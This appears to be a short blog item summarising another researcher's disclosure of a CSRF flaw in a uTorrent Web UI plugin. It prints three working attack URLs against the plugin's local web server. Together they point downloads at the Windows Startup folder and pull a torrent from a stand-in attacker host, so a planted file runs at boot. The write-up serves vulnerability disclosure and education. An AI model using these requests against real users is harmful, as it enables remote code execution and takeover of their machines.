Rob Carter has posted a blog on how to pwn a box via a pure CSRF bug of a uTorrent plugin. When a user installs the uTorrent Web UI plugin, the plugin starts a locally running web server on your machine. Basically, his CSRF exploit force uTorrent to move completed downloads to an arbitrary directory on their system, download arbitrary torrents, and completely own their box. </p>

  • The first CSRF to turn on the “Move completed downloads” option on the uTorrent Web UI. http://localhost:14774/gui/?action=setsetting&s=dir_completed_download_flag&v=1

  • The second CSRF to change the path of where the completed torrent download is placed. For example:</p> http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:

    Documents%20and%20SettingsAll%20UsersStart%20MenuProgramsStartup </li> </ul> * The last CSRF is to force the victim to download a torrent which points to an attacker controlled file. Once the file is downloaded via torrent, uTorrent places the files into startup folder and automatically run the file in the next windows boot.</p> http://localhost:14774/gui/?action=add-url&s=http://www.attacker.com/file.torrent